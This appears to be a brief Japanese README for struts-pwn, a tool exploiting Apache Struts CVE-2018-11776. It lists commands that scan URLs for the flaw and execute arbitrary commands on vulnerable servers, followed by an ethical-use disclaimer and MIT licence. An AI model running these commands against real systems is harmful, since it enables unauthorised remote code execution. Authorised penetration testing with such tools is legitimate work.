
Apache Struts CVE-2018-11776 のエクスプロイト
python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'
python struts-pwn.py --list 'urls.txt'
python struts-pwn.py --exploit --url 'http://example.com/demo/struts2-showcase/index.action' -c 'id'
python struts-pwn.py --exploit --list 'urls.txt' -c 'id'



このプロジェクトは、教育および倫理的なテスト目的のみで作成されています。事前に相互同意なしにターゲットを攻撃するための struts-pwn の使用は違法です。適用されるすべての地域、州、連邦の法律を遵守するのはエンドユーザーの責任です。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。
このプロジェクトは MIT ライセンスの下でライセンスされています。
Mazin Ahmed